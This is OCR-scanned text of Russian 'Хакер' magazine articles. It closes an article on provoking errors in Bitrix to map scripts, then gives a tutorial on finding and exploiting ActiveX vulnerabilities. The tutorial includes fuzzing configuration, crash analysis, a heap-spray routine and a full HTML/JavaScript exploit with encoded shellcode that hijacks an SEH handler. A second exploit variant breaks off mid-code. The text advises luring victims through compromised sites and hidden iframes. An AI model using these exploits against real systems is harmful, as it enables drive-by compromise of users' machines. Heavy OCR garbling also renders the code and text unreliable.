дописался этот же файл от другого запроса, 
то оно несколько «промедлит». Но, опять же, 
все зависит от используемых функций, ОС, 
ФС, настроек и многих факторов. Вот общие 
рекомендации, которые можно дать для 
поиска уязвимых скриптов. В общем случае, 
постоянно увеличивая нагрузку на сервер, 
злоумышленник рано или поздно все равно 
получит то, на что рассчитывает. Конечно, и 
такие старания нетрудно пресечь, но это уже 
выходит за рамки веб-приложения. 
Рассмотрим теперь живой пример на 
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отчет о работе РоС. Нашел за зо минут 83 уровня 
иерархии, и 12бскриптов. 
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получаем значение максимальной длины БЕТ за- 
проса. 






последней версии Битрикса и тестовой площадке. В системе были 
выявлены некоторые особенности, а именно: 

1. При загрузке файла в качестве аватара, он помещается в дирек- 
торию с трехсимвольным именем, диапазон символов хексовый 

(1 6 Л 3=4096]. 

2. При обновлении аватара, директория со старым аватаром удаля- 
ется. 

3. При загрузке аватара с именем длиннее 250 символов, директория 
создается, а файл не загружается. Созданная таким образом дирек- 
тория уже не удаляется. 

Можно рассчитывать на то, что обильное количество созданных 
директорий будет увеличивать время выполнения скрипта загрузки 
аватара. Проверить это можно простым запросом МиШрагІ, запу- 
щенным в несколько потоков. Опять-таки, проверяем на аномалии 
по длине и времени ответа, сохраняя такие результаты в файлы. 
Запустив такой алгоритм в 20 потоков, я получил файлы, отличаю- 
щиеся по длине. 

РАЗБИРАЕМ РЕЗУЛЬТАТЫ 

По завершении отлова заветных ответов дело остается за малым — 
аккуратно разобрать их, вычленить пути из сообщений об ошибках и 
расположить по уровням в зависимости от длины ответа. Это решает- 
ся примерно таким кодом: 

ЕипсСіоп рагзеКезиІСз ( $сііг) 

{ 

ІІ ( ІЗ_СІІГ ( $СІІГ ) ) 

{ 

іі ($сШ = орепсііг ( $сііг) ) 

{ 

$і = 0 ; 

$гезиІСз = аггау () ; 

вдМІе ( ($Ні1е = геасісііг ( $сШ) ) ! == Наізе) 

{ 

$сигРі1е = $сііг . $:Еі1е; 

$:ЕЪ. = ііореп ( $сигРі1е , 'г'); 

$:Еі1ес1а1іа = Егеас! ($:ЕЪ., ііііезіге ( $сигРі1е) ) ; 

$^зіге = Рііезіге ( $сигРі1е) ; 

$р1 = зкгроз ($бі1есіака/'Махітті ехесиСіоп Діте "); 

іі ($р1 === ^аізе) {} 

е1зе{ 

$р2 = $р1+52 ; 

$рЗ = зкгроз ( $:Еі1есІака, "</Ь>" , $р2 ) ; 

($рЗ === ііаізе) {} 
е1зе{ 

$1еп = $рЗ - $р2 ; 

$ракЬ. = зиЬзСг ( $5і1ес1а1:а , $р2 , $1еп) ; 

$ипідие = Сгие; 

/ /Проверяем на уникальность 



ііогеасЪ. ($гези 1 кз аз $кеу=>$ѵа 1 ие) { 
іі ( $ѵа 1 ие [ ' ракЪ. ' ] = = $ракЪ.) { 

$ипідие=:І:а 1 зе; 

Ьгеак; 

} 

} 

і:Е ($ипідие){ 

$ 1 еп = $рЗ - $р 2 ; 

$гез = аггау (' ракк 1 => 
зиЬзкг ( $:Еі1ес1ака , $р2 , $1еп) , ' Іеп 1 =>$^зіге) ; 
$гези 1кз [ $і ] = $гез ; 

$і + +; 

} 

} 

} 

ксіозе ($ йі) ? 

} 

сіозесііг ( $сШ) ; 

$зІ 2 е=соипк ($гези 1кз) -1 ; 

//Сортируем результаты по длине 
ког ($і = $зізе; $і>= 0 ; $і--) { 

ког ($3 = 0 ; $з<=($і- 1 ); $ 3 ++) 

ік ($гези 1кз [$з ] [ ' 1 еп' ] >$гези 1кз [$з+1] [ ' Іеп' ] ) { 

$к = $гези 1кз [$з ] ; 

$гези 1 кз [ $з ] = $гези 1кз[$з'+1]; 

$гези 1кз [ $з +1 ] = $к; 

} 

} 

гекигп $гези 1 кз; 

} 

} 

} 

На выходе получаем отсортированный массив с длинами ответов и име- 
нами скриптов, в которых возникла ошибка. Самое приятное — можно 
восстановить хоть весь стек, только это займет значительное время. К 
слову, на своей виртуалке я наловил 126 классов за 30 минут. Остается 
оформить отчет по уровням иерархии в красивом формате. Собственно, 
все это внутри РоС и содержится — пользуйся на здоровье! 

ЗАКЛЮЧЕНИЕ 

Это конечно не все возможные варианты получения информации 
через провокацию ошибок. Существует еще множество вариантов, 
методик и техник, применимых как для конкретных сайтов, так и 
для движков целиком. Все эти техники, приемы и методы предстоит 
еще найти и использовать, публиковать и модернизировать. Есть и 
множество проблем — например, оптимизировать РоС для уменьше- 
ния количества запросов и уменьшения следов в логах. Эта статья 
преследовала цель показа основ техники. Надеюсь, получилось. Как 
всегда, отвечаю в блоге на вопросы.^ 
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ГЛУМИМСЯ 
НАД объект 

ВЗЛОМ АСТІѴЕХ 

Тема уязвимостей в АсІіѵеХ-компонентах 
уже не нова. Она стала популярна в 2006 
году, когда стала понятна истинная угроза 
от использования браузерных надстроек. 
Технология АсІіѵеХ является развитием 
СОМ-технологий МісгозоТТ и, по сути, 
представляет собой библиотеку діі или 
01_Е-модуль с расширением ОСХ, и который 
устанавливается пользователем в составе какого- 
либо ПО, которое, конечно, можно взломать. 




БЕЗОПАСНОСТЬ 

Для инициализации объекта из установ- 
ленных библиотек может использоваться 
НТМІ_тэг <обіесТ ...>, в котором указывается 
идентификатор класса — СІ_5Ю. Кроме того, 
можно использовать Чаѵа5сгір1:-конструктор 
АсбѵеХО^есД.), в таком случае указывается 
идентификатор программы — РгодЮ. СІ_5Ю 
представляет собой глобальный и уникальный 
идентификатор вида {11111111 -2222-3333- 
4444-555555555555}. РгодЮ — строковый иден- 
тификатор компоненты, по сути, ссылающийся 
на СИЭЮ. Все СІ_5Ю, РгодЮ и прочие настрой- 
ки для СОМ-объектов хранятся в реестре. 

Из этого краткого введения можно понять 
суть атак: злоумышленник создает НТМІ_- 
страничку с инициализацией уязвимого 
АсбѵеХ компонента, вывешивает эту страничку 
на порносайт (вариантов реализации масса: 
можно использовать Х55 или встроить такой 
НТМІ_-код в невидимый фрейм взломанного 
сайта и т.д.], после чего заманивает жертву на 
уязвимую страничку. Если у зашедшего на сайт 
пользователя установлена уязвимая версия 
эксплуатируемого компонента, то срабатывает 
эксплойт со всеми вытекающими последстви- 
ями. Но не все так просто: для обеспечения 
безопасности клиента был создан механизм, 



проверяющий, помечен ли вызываемый 
компонент как безопасный, разрешено ли 
вызывать его методы и задавать свойства 
и разрешено ли ему вообще запускаться 
из браузера. Если, к примеру, компонент не 
помечен как безопасный, то АсбѵеХ не будет 
загружен или, в зависимости от настроек 
безопасности браузера, пользователю будет^ 
задан соответствующий вопрос. Это, в 
принципе здравое решение, только вот прі 
нимает его разработчик компонента. Отсюд! 
логика — удобно ведь, когда все работает 
тихо и мирно — без вопросов. Поэтому мно- 
жество АсбѵеХ- компонентов необоснованно 
помечены как безопасные, и для инициали- 
зации, и для вызова методов. Собственно 
сами параметры безопасности прописываются 
в реестре. Допустим, у нас имеется АсбѵеХ- 
элемент с СИЭЮ {11111111 -2222-3333-4444- 
555555555555}. Чтобы проверить настройки 
безопасности этого компонентов, достаточно 
найти в реестре ключ — НКЕУ_СЕА55Е5_ 
П00Т\СЕ5Ю\{1 11111 1 1-2222-3333-4444- 
555555555555} и рассмотреть его дочерние 
ключи в разделе Ітріетепіюсі Саіедогіев (если 
таковой вообще существует, если нет, значит 
объект не помечен как безопасный в реестре). 
Наличие следующих ключей будет говорить 




нам о том, что наш компонент помечен как 
безопасный для инициализации и для скрип- 
тинга. 

{7ББ95802-9882-11СР-9РА9- 
00АА006С42С4 } — Объект можно ини- 
циализировать 
{7ББ95801-9882-11СР-9РА9- 
00АА006С42С4 } — Можно вызывать 
методы и задавать свойства 

Кроме того, компонент может быть вообще 
запрещен для использования в браузере. Это 
определяется наличием, так называемого, 
КіШЗіЕа. Проверить наличие этого чудо-бита 
можно также в реестре — НКЕУ_ЕОСАЕ_ 



► 058 



ХАКЕР 04 /135/ 10 






АсІіѵеХ АсгоЬаІ Реасіег’а — пример безо- 
пасного компонента 



МАСНІЫЕ\$0РТѴѴАРЕ\Місго5оП\Іп»егпе* ЕхрІогег\Ас(іѵеХ 
Сотра(ІЬІ1ііу\{1 11111 11-2222-3333-4444-555555555555}. 
Значение параметра СотрабЬіІііу Еіадз в НЕХ’е равное 
0x00000400 говорит о наличие КіІІВіѣ’а. 

Но и это еще не все. Программисты — очень ленивые 
люди, им не хочется лишний раз лезть в реестр. Так, на 
различных форумах можно найти вопросы: «Как мне 
убрать ошибку ‘ОЬіесІ: поі заію іюг зсгірЕіпд’ при вызове 
моего АсІіѵеХ? Да так, чтобы в реестр лезть не надо было 
...». И они получают один и тот же ответ — использовать 
интерфейс ІОЬіесіЗаЫу, Эта штука позволяет задавать 
параметры безопасности компонента «изнутри» определяя 
источник данных. Если в качестве одного из параметров 
передать флаги ІЫТЕКЕАСЕЗАРЕ^ОВ^ЫТВІІБТЕВ. 
САЕЕЕП и ІМТЕНЕАСЕ5АЕЕ_Е0Р_ІІІ\ІТНІІ5ТЕ0_0АТА, то 
появляется возможность доступа к компоненту и посылки 
данных для компонента. 

УЯЗВИМОСТИ 

Допустим, мы нашли компонент без флага убийства и 
помеченного как безопасный. Такой компонент интересен 
с точки зрения наличия уязвимостей. Какие же уязвимости 
интересуют потенциального злоумышленника? Компонент 
может быть написан на любом языке, но так как чаще всего 
используется язык Си/Си++, то такие уязвимости как пере- 
полнение буфера, являются самыми популярными. Кроме 
того, уязвимости форматной строки также свойственны 
компонентам, написанным на Си. Все эти уязвимости хоро- 
шо известны, как и способы их поиска. 

Для облегчения жизни существуют автоматизированные 
средства — так называемые Еиггіпд-инструменты, среди 
которых особо популярен СОМ Раісіег [ ІаЬз.ісІеіюпзе.сопп/ 
5оКѵѵагеЛи22Іпд.рЬр1 . Есть и другие средства, вроде АХтап 
[сНаіІаІо^епзе.пеіАооІз/ахтап/ І. но мне больше по душе 
именно СОМВаібег, поэтому в этой статье я буду пользо- 
ваться им. Такие утилиты составляют список установлен- 
ных АсбѵеХ, их свойств и методов. Затем программа пооче- 
редно дергает методы с разными хитрыми параметрами и 
смотрит, не упал ли ІЕ. Если упал, то почему и где. Таким 
образом, можно найти стандартные уязвимости при про- 
стом формате входных данных. 

Кроме классических уязвимостей, существуют еще и 
«специфические», которые свойственны именно АсбѵеХ- 
компонентам. Дело в том, что многие компоненты работают с 
файловой системой, реестром и даже командной строкой ОС 
но, тем не менее, помечены как безопасные. Причем рабо- 
та со всеми этими вкусностями происходит через вызовы 
доступных методов. Это означает, что для «захвата» рабочей 
станции пользователя не нужно искать хитрых уязвимостей, 
ведь компонент сам предоставляет доступ к ОС. Поиск таких 
уязвимостей также может быть обнаружен при ішгіпд’е или 
при просмотре имен методов, ведь что еще может делать 
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Поиск безопасных компонентов 



метод с именем ЕхесиІеСтбО? Разберемся поподробнее 
с поиском уязвимостей, работая с ^илитой СОМРаібег. 

Кроме того, для поиска небезопасных методов совместно с 
СОМРаібег рекомендую использовать незаменимые утилиты 
господина Руссиновича — ЕіІеМоп и РедМоп. Итак, скачав 
и установив все утилиты, можем приступать к их настрой- 
ке. Начнем с СОМРаібег’а. Настройку можно произвести 
прямо из утилиты, кликнем по маленькой белой строчке 
— Ѵіеѵѵ в левом верхнем углу программы. В появившемся 
меню можно выбрать Орбопз и задать там пути до браузе- 
ра и дебаггера, а также поменять логику фаззинга — Ебіі 
ВиіІсІАгдз.ѵЬз. Если выберем последнее — откроется 
блокноте конфигурационным файлом, написанном в виде 
Ѵізиаі Вазіс-скрипта. В нем нас будет интересовать функ- 
ция беіЗіхАгдзО, которая отвечает за генерацию строк для 
исследуемых параметров и свойств. 



Рог і=100 Со 10000 зРер 1000 

рагепР . зРгз . асісі " ЗРгіпд ( " & і & 
" "А" " ) " 
пехР 



Рог і=10000 Со 100000 зРер 10000 
рагепР . зРгз . асісі " ЗРгіпд ( " & і & 
" "А" " ) " 
пехР 



Данный код будет генерировать строки из букв «А» длиной 
от 100 до 10000 с шагом 1000. А потом длиной до 10000, но 
уже с шагом 100000. Всего получится по 20 вызовов для 
каждого метода компонента. Кроме того оставим строки с 
«%5» и «%п» — это позволит найти уязвимости форматной 
строки. 

Добавим еще пару параметров: 



" "С: \31337 .РхР " " " 

" "31337 

" "ЪРРр://" "+ЗРгіпд (10000, 



рагепР . зРгз . асісі " 
рагепР . зРгз . асісі " 
рагепР . зРгз . асісі " 

" "В" ") " 

рагепР . зРгз . асісі " " "С : \ " " +ЗРгіпд ( 10000 , 
" "В" ") " 




> СІѴСІ 

• Видеоматериал, 
описывающий про- 
цесс нахождения и 
эксплуатации уязви- 
мостей АсІіѵеХ, пред- 
ставлен на диске. 

• Также на диске есть 
скрипт генерации 
простых шелкодов 

и примеры эксплойтов 
(только для ознаком- 
ления!!!) 



Это позволит нам найти некоторые небезопасные методы. 
После того как отредактировали скрипт, сохраним его и 
начнем поиск... поиск «безопасных» компонентов. Для 
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| ІПЙШСІІОП 



ШР РМОПР РТП ІЕ5І+1Э01Т 



ЕхсерЫоп Сойе: АССЕЗЗ^ѴІОЬАТІОМ 
Оізазт: А46256 СИР ПН ОКТ' РТЕ [Е5І+130] , 1 



ЗеЪ СЙЭІп: 



(еіЕізгаСр . Г'Ы.) 



1 А52644 еляпя&р * 1>ЬЬ 

2 41414І4І 




Саііесі Ггот 


КеЫагпз То 


А4 6256 
етэтЪ р . А 4 377 6 


еюаш&р р А 48776 


Кёдізьегэ : 





ЕІР ООА46256 
ЕАХ 00000400 
ЕВХ ГГГТВТГТ 

ЕСХ 00 13 Е 950 -> Азе: ЕггоГ СгеаЫпд Гііе: ААААААААААААААААААААААААААААА 



Контроль на 5ЕН дескриптором и адресом возврата! 



1 




Память до Ьеаргргау 



Память после Ьеар зргау 




установленные из интернета, часто находят 
свой дом тут: %ѴѴІ N 01 Р%\ОоѵѵпІоасІесІ Ргодгат 
Еііез. Лично у меня на момент написания ста- 
тьи оказалось около 5000 объектов на систем- 
ном диске и в его подкаталогах. Выделим их 
все и, щелкнув правой клавишей, выберем 
пункт Виіісі Об] ЗаМу Рероіі Ьг Зеіесіесі — 
это даст команду СОМРаібег’у искать именно 
безопасные объекты. Поиск займет некото- 
рое время, так что запасемся терпением. В 
процессе поиска индицируются три числа. 
Первые два разделены дробью. Они показы- 
вают сколько объектов просмотрено и сколько 
еще осталось. Третье число, через дефис 
— сколько всего «безопасных» объектов заре- 
гистрировано. Всякий раз, как только третье 
число увеличится на единицу — можешь 
радоваться. После того как сканирование 
закончится, можно просмотреть обновленный 
список компонентов, которые можно исполь- 
зовать в ІпіегпеІ Ехріогег без особых проблем. 
Для этого вновь жмем кнопку Зіаіі и выбира- 
ем пункт СЬоозе Ітот сопігоіз ІЬаІ: зЬоиШ Ье 
ІоабаЫе іп ІЕ. Вот теперь перед нами список 
потенциально интересных объектов. Теперь 
настроим фильтр ЕіІеМоп и РедМоп на филь- 
трацию по строке «31337». Таким образом, 
если какой либо метод пишет в файловую 
систему или реестр, то этот факт отобразится 
в утилитах Руссиновича. Кроме того, поиск 
потенциально опасных методов можно осу- 
ществить прямо в СОМРаібег’е, для этого 
опять же надо выделить объекты и нажать на 
них правой кнопкой, в появившемся меню 
выбрать Зсап Зеіесіесі Еог Зіхіпдз, далее через 
запятую указываем параметры фильтра — Еіе 
.раЕЬ.и гІ,кеуДоасІ,сІоѵѵпІоасІ .заЕе.геасІ.ѵѵгіЕе.ЕіІе.е 
хесиіе и т.п. В итоге получим список подозри- 
тельных (с точки зрения наименования) мето- 
дов и классов. Для того чтобы начать фаззинг, 
выделим несколько интересующих нас объек- 
тов, кликнем по ним правой клавишей и выбе- 



этого нажмем кнопку Зіаіі, выберем пункт 
Зсап а бігесіюгу Еэг гедігіегесі СОМ зегѵегз. 
Появится диалоговое окно для выбора 
директории. Выбираем системный диск, или 
директорию, куда установлено новое ПО, 
которое мы хотим протестировать. В итоге 
получим список объектов. Попробуем выде- 
лить все объекты, чтобы потом осуществить 
по ним фильтрацию. Если объектов окажется 
очень много, то СОМРаібег будет немного 
подвисать, поэтому советую использовать 
в качестве директории конкретные папки 
приложений или указывать путь напрямую к 
конкретным библиотекам приложения. Все 
эти пути можно узнать, запустив ЕіІеМоп при 
установке приложения. Например, АсбѵеХ, 



Щ СРУ 5 т«ІП ііі гса й , тогі и Ее сгпятт ! р 3^; 
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РіІеМоп обнаружил фактобращения кфайловой системе 




Ищемзначащиедля насчасти 
входного параметра 

рем Р 1122 Беіесіесі. СОМ Раісіеп в зависимости 
от объема, подергается в судорогах и выдаст 
окно фаззинга, в котором будут перечислены 
сгенерированные скрипт-файлы. Осталось 
нажать клавишу Ведіп Еиггіпд, и все... можно 
идти спать :). 

эксплойт 

На следующие утро можно начинать анализ 
того, что стало с окном фаззинга. Нас инте- 
ресует ситуация, когда код попал в исклю- 
чительную ситуацию. В качестве примера я 
возьму уязвимость переполнения буфера в 
етзтТр.сШ 6-ой версии. Эта библиотека вхо- 
дит, например, в поставку Огасіе Босиппепі 
Саріиге последней версии (10.1350) [ огасіе. 
сотЛесЬпоІодѵ/зоІІѵѵаге/ргосІисІз/сопІепІ:- 
тападетепі/іпсіех сІс.ЫтІ ). так что уязви- 
мость является актуальной. 

Итак, первое — анализ результата фаззинга. 
Видим несколько СаизесІ Ехсерііоп, выделяем 
и дважды кликаем по любому понравив- 
шемуся. Появится окно анализа исключи- 
тельной ситуации, в нем можно увидеть, в 
каком участке кода вышла ошибка, а также 
состояния регистров и стека, кроме того, 
цепочку вызовов. Стоит обратить внимание, 
что в данном примере, хотя регистр ЕІР и не 
переписался значением 41414141, зато один 
из адресов возврата переписался, и 5ЕН- 
дескриптор также переписался. Все эти факты 
говорят нам о том, что можно быстро создать 
рабочий эксплойт. Попробуем разобраться, 
что происходит с уязвимой программой во 
время ошибки. Для этого воспользуемся 
знаменитым отладчиком ОИуБВО (оІІусІЬд.сІе). 
Вызвать отладчик можно прямо из СОМ Раісіег, 
для этого кликнем правой кнопкой по одной 
строчке из списка исключительных ситуаций и 
выбирем пункт ЕаипсЬ іп ОНу. Откроется окно 
отладчика, в котором жмем Е9, тем самым 
запустив исследуемый компонент в отладчике. 
0 Ну остановится на первой исключительной 
ситуации, а именно на инструкции сравнения 
СМР, которая пытается сравнить значение по 
адресу [ЕБІ+180] с единицей. Так как значение 
регистра Е5І переписано значением букв “А” 




Передачауправления "нашему" 
обработчику исключительной 
ситуации 

— а именно 0x41414141 , то возникшая исклю- 
чительная ситуация вполне логична, так как по 
адресу 0x41414141+0x180=0x41414201 ничего 
нет, ведь программа вообще не использует это 
адресное пространство. Кроме того, рассмотрим 
стек (нижний правый фрейм окна отладчика). 

В этом окне можно наблюдать, как часть стека 
бессовестно загажена значением 41, включая 
адреса возврата и адрес БЕН дескриптора. 
Кроме того, изучая код, который следует сразу 
за строчкой вызова, можно увидеть, что если 
бы не это исключение, то процессор дошел бы 
до инструкции САЕЕ БѴѴОВВ РТР 05:[ЕЗІ+СС], а 
так как регистр ЕБІ мы контролируем, то кроме 
адреса возврата и указателя на БЕН, возможна 
еще передача управления через регистр ЕБІ. 
Таким образом, есть, как минимум, три пути 
реализации эксплойта. 

Чтобы понять, какая часть вводимой нами 
строки на какой элемент системы влияет, будем 
опытным путем менять размер вводимого буфе- 
ра и его значения. Сначала ищем минималь- 
ный размер буфера, при котором появляется 
исключительная ситуация. В данном примере 
вводимая длина оказалась не менее 308 байт. 
Если ввести меньше, то мы теряем возмож- 
ность переписывать БЕН дескриптор. Следует 
вывод, что из 308 байт, последние 4 байта вли- 
яют как раз на БЕН -указатель. Опытным путем 
меняем последние 100 байт строки, чтобы 
выяснить какая ее часть влияет на регистр ЕБІ 
и адрес возврата. Это также можно сделать в 
СОМ Раісіег’е, используя ВиіІсІАгдз.ѵЬз: 

Ьед=256 

зСгі=8Сгіпд (Ьед , " 0 " ) 

1еССег= "А" 

бог і=(Ьед+4) Со 500 зСер 4 
іб 1еббег="2" бЪеп 
Іеббег = " А " 
епсі іб 

збгі=збгі+3бгіпд (4 , Іеббег) 
1еббег=СЪ.г (Азе (Іеббег) +1) 




СОМКаігіег показывает нам под- 
ноготную компоненты 



рагепб . збгз . асісі " " " " &збгі& " " " " пехб 

В итоге оказалось, что 260 байт буфера не 
влияют на нужные параметры, потом 4 байта 
записываются в регистр Е5І. Дальше еще 4 
байта нас не интересуют, затем идут 4 байта, 
переписывающие адрес возврата. После еще 
32-х байт идут последние 4 байта, которые 
перезаписывают указатель БЕН. Грубо говоря, 
при таких входных параметрах: 

бі11= 8бгіпд(260, "X") 

рагепб . збгз . асісі " " "&бі11&"ССССЕЕЕЕ 

ААААРРРРРРРРРРРРРРРРРРРРРРРРРРРРРР 

РРВВВВ" " " 

Будут переписаны следующие значения: 

ЕЗІ=СССС (43434343) 

Дескриптор ЗЕН=ВВВВ (42424242) 

Адрес возврата=АААА (41414141) 

В случае, если мы хотим использовать ЕБІ, то 
просто вместо СССС указываем адрес, содер- 
жащий адрес шеллкода. Но гораздо проще 
передать адрес в указателе БЕН-блока. Так 
каку нас возникнет исключительная ситуация, 
то управление перейдет по адресу, указанному 
в БЕН-дескрипторе. Адрес возврата исполь- 
зовать в данном примере сложнее, так как 
управление, по любому, перейдет в обработку 
исключительной ситуации и чтобы «красиво», 
без ошибок в коде, выйти на возврат функции, 
надо слишком сильно заморачиваться на то, 
чем же именно мы переписываем значения 
стека. Поскольку это явно трудно, то для 
эксплойта будем использовать первые два 
варианта. Теперь пару слов о шеллкоде. Взять 
можно любой шеллкод, даже с наличием 
нулевых байтов. Разместить шеллкод можно в 
куче браузера (для ІЕ 6/7, виртуальная память 
общая) или прямо в передаваемом параметре. 
В оригинальном эксплойте для этого компо- 
нента (ехріоіі-сіь.сопп/ехріоііз/і 0007) исполь- 
зовался метод перезаписи БЕН-указателем 
на )тр езр из памяти и5ег32.сІІІ. В момент 
вызова Е5Р будет указывать в середину пере- 
даваемой строки (которая уже в стеке), после 
которой идет шеллкод. В этом варианте мы 
зависим от версии и5ег32.сІІІ и от символов 
нулевого байта. К тому же, такой вариант не 
универсален для большинства уязвимостей 
этого типа. В большинстве случаев исполь- 
зуют размещение шел кода в куче, которую 
атакующий сам и создает. Эта техника назы- 
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► обі 







взлом 



вается Ьеар зргау (разбрызгивание куч, ха!). 
Суть ее заключается в том, что мы создаем 
много-много куч с пустыми операторами (пор) 
и с шеллкодом в конце. Мы создаем так много 
куч, что виртуальная память іехріогег’а бук- 
вально полностью загажена нашими кучами. 
Таким образом, с вероятностью 99%, по адре- 
су, например. ОхОбОсІОсІОсІ будет находиться 
наша куча с шеллкодом. Создать такие кучи 
проще простого — с помощью конкатенации 
при инициализации массива в Эаѵа5сгірЕ 
Простейший пример Ьеар зргау: 

ѵаг ЬідЬк=ипезсаре ( " %и9090%и9090% 
и9090%и9090 " ) ; //90 — пор, пустой 
оператор 

ѵіЬіІе (ЬідЬк . 1епдкЬ<0х40000 ) 
ЬідЬк=ЬідЬк+ЬідЬк; //создаем 
много 

//пор' ов — пор-зіісіе 
ѵаг шеш=пеѵ^ Аггау ( ) ; 

Іог(і=0; і<400;і++) 

теш [ і] =ЬідЬк+з1іе11 ; //заносим 

пор-зіісіе, шеллкод и создаем кучу 

Шеллкод возьмем из метасплойта или любой 
другой. Чтобы занести его в кучу правильным 
образом, нужно перевести его в ипісобе-формат. 
Для этого переставим каждые два байта шелл- 
кода. То есть последовательность байтов ОхАА 
ОхВВ ОхСС 0x00 в іаѵаЭсгірІ: ипісобе формате 
будет выглядеть как %иВВАА %иООСС. В мета- 
сплойте можно сразу выбрать шеллкод в виде 
ЭаѵаБсгірЕ Для иных шеллкодов нужно преоб- 
разовывать байты по вышеуказанной схеме. 

На диске есть мой небольшой скриптик, кото- 
рый это и делает. Скрипт может генерировать 
шеллкоды в формате іаѵаЗсгірі для двух задач: 
исполнение команды и, загрузка и исполнение 
файла. Чтобы создать шеллкод, который, напри- 
мер, открывает блокнот, просто запустим скрипт 
(требуется регі): С:\>регІ збеіісосіедеп.рі ехес 
поіерасі. Теперь реализуем сам эксплойт, кото- 
рый я снабдил понятными комментариями: 

<нтмь> 

<НЕАБ> 

<ТІТЬЕ>] [акер АскіѵеХ ЗЕН Зріоікс/ 
ТТТЬЕ> 

</НЕАШ> 

<ВОБУ> 

«ЭВШЕСТ ІЛ= ' ѵиіп ' 

с1аззісі= ' сізісі: б8АС0Б5Е-0424-11Б5- 
822Е-00С04Е6ВА8Б9 ' ></оЪтеск> 
<ЗСКІРТ> 

Іипскіоп Ехріоіб ( ) { 

//Шеллкод — ехес поберасі 
ѵаг зкеіі = ипезсаре ( " %ие8іс%и0089 
%и0000%и89 60%и31е5%иб4сі2%и52 8Ь%и8ЬЗ 
0%и0с52%и52 8Ь%и8Ы4%и2 872%иЬ7 0і%и2 6 
4а%иЮ1%ис031%иЗсас%и7с61%и2с02%ис 
12 0%и0сісі%ис7 01%иі0е2%и57 52%и52 8Ь%и 
8Ы0%иЗс42%исі001%и408Ь%и857 8%и74с0% 
и014а%и50сі0%и488Ь%и8Ы8%и2 058%исі3 01 
%иЗсеЗ%и8Ь49%и8Ь34%исіб01%иіі31%ис03 
1%ис1ас%и0сісі%ис7 01%ие03 8%иі47 5%и7сі 
0 3 %иЗЫ 8 %и2 4 7 с!%ие2 7 5 %и8Ь5 8 %и2 458 %исі 




3 01%и8Ъ66%и4Ъ0с%и588Ъ%и011с%и8Ъс13%и 
8Ь04%исі001%и4489%и2424%и5Ь5Ь%и59б1% 
и515а%ие0іі%и5158%и8Ь5а%иеЫ2%и5сі86 
%и016а%и858сі%и00Ь9%и0000%иб850%и8ЬЗ 
1%и87 6І%иб5ІІ%ие0ЪЪ%и2а1с1%и680а%и95 
а б %и9 сіЬ(і%исі5 1 1 %и 0 б 3 с %и 0 а7 с%иіЬ8 0 %и7 
5е0%иЬЬ05%и1347%ибі72%и00ба%иіі53%и 
6еб5%и746І%и7065%и6461%и0000 " ) ; 

/ /Много куч 

//По адресу ОхОсЮсЮсЮб. с вероятно- 
стью 99% будет наша куча с шелл- 
кодом 

ѵаг ЫдЬк=ипезсаре ( " %и9090%и9090%и 
9090%и9090 " ) ; 

ѵЛтіІе (ЫдЬк. 1епдкЬ.<0х40000 ) 
ЫдЬк=ЫдЬк+ЫдЬк ; 
ѵаг теш=пе\ѵ Аггау ( ) ; 

Іог(і=0; і<400;і++) 
шет[і] =ЫдЬк+зЬе11; 

ѵаг Ы=ипезсаре ( " %63 " ) ; //началь- 
ная часть буфера 
ѵаг Ьиі=" " ; 

мМІе (Ьиі . 1епдкЬ<2 60 ) Ьиі=Ьиі+Ы; 
Ьиі+=ипезсаре ( " %61%61%61%61 " ) ; // 
ЕЗІ не нужен 

Ьиі+="РРРР" +ипезсаре ( " %б2%62%62%б2 " 
);// Адрес возврата не нужен 
Ьиі+= ” ТНХ_ТО_МУ_ШІЕЕ_ЕОК_ 

ЬОѴЕ ! ЕЕЕЕЕЕЕЕ " ; 

Ьиі+=ипезсаре ( " % 0с3_% ОсЗ.% ОсЗ.% ОсЗ. " ) ; / /ЗЕН 
— указывает на кучу с шеллкодом 
ѵиіп. ЗиЬшібТоЕхргезз (Ьиі) ; 

} 

Ехріоіб ( ) ; 

</ЗСКІРТ> 

</ВОБУ> 

</НТМЬ> 

Этот код формирует много куч с шеллко- 
дом и строку, длиной 308 байт, формата: 

" сссс<2 б 0 >...сссааааРРРРЬЬЬЬТНХ_ТО_ 
МУ_У7 I Р Е_Р О К_Ь О ѴЕ ! РРРРРРРР [ адрес ЗЕН 
дискриптора] ". Тут аааа станет ЕБІ, а ЬЬЬЬ 
— адресом возврата, но они в данном экс- 
плойте не нужны и показаны для понимания 
сути. В самом простом виде можно просто 
создать 308 байт с ОхОсІ — адресом кучи. В 
результате открытия данной Ы:тІ- странички, 
без каких-либо лишних вопросов откроется 
приложение "позера б" — результат работы 
шеллкода (конечно, если у жертвы установлен 
уязвимый АсбѵеХ компонент). Второй вариант 
эксплойта, который вместо 5ЕН будет исполь- 
зовать инструкцию САН [Е5І+СС] в самой 
программе. Для этого создадим вместо одной 
кучи — две: 

ѵаг шеш=пехѵ Аггау ( ) ; 
ѵаг і=0 ; 

//Много куч с адресами шеллкода 
ѵаг ЫдЬк=шіезсаре ( " %и0Ь0с1%и0сЮс1%и 
0Ь0с1%и0с10с1" ) ; 

ѵ/МІе (ЫдЬк. 1епдкЬ<0х40000 ) 
ЫдЬк=ЫдЬк+ЫдЬк ; 

іог ( ; і<2 00;і+ + ) теш [ і ] =ЫдЬк+шіез 
саре ( " %и0б.0сі%и0(і0б%и0сі0(і%и0(і0(і" ) ; 




//теперь кучи с пор-сдвигом и 
шеллкодом 

ѵаг ЫдЬк2=ипезсаре ( " %и9090%и9090% 
и9090%и9090 " ) ; 

ійіііе (ЫдЬк2 . 1епдкЬ<0х40000) 
ЫдЬк2=ЫдЬк2+ЫдЬк2 ; 
іог ( ; і<400 ; і++ ) 
тет[і] =ЫдЬк2 + зЬе11 ; 

//По адресу ОхОсЮЬОсЮЬ с вероятно- 
стью 99% будет наша куча с шелл- 
кодом 

ѵаг М=ипезсаре ( " %63 " ) ; 
ѵаг Ьиі=" " ; 

вдШе (Ьиі . 1епдбЬ<2бО) Ьиі=Ьиі+Ы; 
//в данном случае приложение попы- 
тается сначала сделать 
//САШЬ [ 0x050505 05+СС] и тогда 
//ЕІР станет равным ОхОсіОсіОсіОсі. 
Именно там у нас шеллкод. 
і+=ипезсаре ("%05%05%05%05"); //ЕЗІ 
— указвает на первую группу куч 
ЬиІ+= "ЕРЕР" +ипезсаре ( " %61%61%61%61 " 
);// Адрес возврата не нужен 
Ьи I + = " НІ_ТО_КО№ЖЕМСНЕО_ 
РРРРРРРРРРРРРР " ; 

ЬиІ+=ипезсаре ( " %б2%б2%б2%62 " ) ; //ЗЕН 

